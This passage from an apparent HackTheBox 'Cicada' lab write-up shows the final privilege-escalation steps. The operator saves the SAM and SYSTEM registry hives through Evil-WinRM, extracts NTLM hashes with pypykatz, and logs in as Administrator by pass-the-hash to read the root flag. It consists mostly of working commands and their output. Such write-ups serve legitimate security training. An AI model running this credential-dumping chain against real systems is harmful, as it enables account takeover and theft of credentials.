*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\sam C:\Users\emily.oscars.CICADA\Desktop\sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\system C:\Users\emily.oscars.CICADA\Desktop\system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/24/2024 7:40 PM 49152 sam
-a---- 11/24/2024 7:40 PM 18558976 system
-ar--- 11/23/2024 9:49 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Desktop\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Desktop\system to system
Info: Download successful!
Extract the NTLM hashes from SAM and SYSTEM files
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Cicada/pypykatz]
└─$ pypykatz registry --sam ../sam ../system
/usr/lib/python3/dist-packages/pypykatz/_version.py:11: SyntaxWarning: invalid escape sequence '\.'
"""
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Login as user: Administrator
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Cicada/pypykatz]
└─$ evil-winrm -i 10.129.212.172 -u Administrator -H "2b87e7c93a3e8a0ea4a581937016f341"
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
Read flag: root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/23/2024 9:49 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
328abd46880ad9e16107a04355bae504
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
cicada\administrator S-1-5-21-917908876-1423158569-3159038727-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CICADA\Group Policy Creator Owners Group S-1-5-21-917908876-1423158569-3159038727-520 Mandatory group, Enabled by default, Enabled group
CICADA\Domain Admins Group S-1-5-21-917908876-1423158569-3159038727-512 Mandatory group, Enabled by default, Enabled group
CICADA\Schema Admins Group S-1-5-21-917908876-1423158569-3159038727-518 Mandatory group, Enabled by default, Enabled group
CICADA\Enterprise Admins Group S-1-5-21-917908876-1423158569-3159038727-519 Mandatory group, Enabled by default, Enabled group
CICADA\Denied RODC Password Replication Group Alias S-1-5-21-917908876-1423158569-3159038727-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ============================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1f6
IPv6 Address. . . . . . . . . . . : dead:beef::7e1:af7c:d586:5ae6
Link-local IPv6 Address . . . . . : fe80::cfc2:a7ed:b287:1fd0%6
IPv4 Address. . . . . . . . . . . : 10.129.212.172
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%6
10.129.0.1
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
References
[Windows Privilege Escalation: SeBackupPrivilege]( https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/)
[pypykatz]( https://github.com/skelsec/pypykatz)
Lessons Learned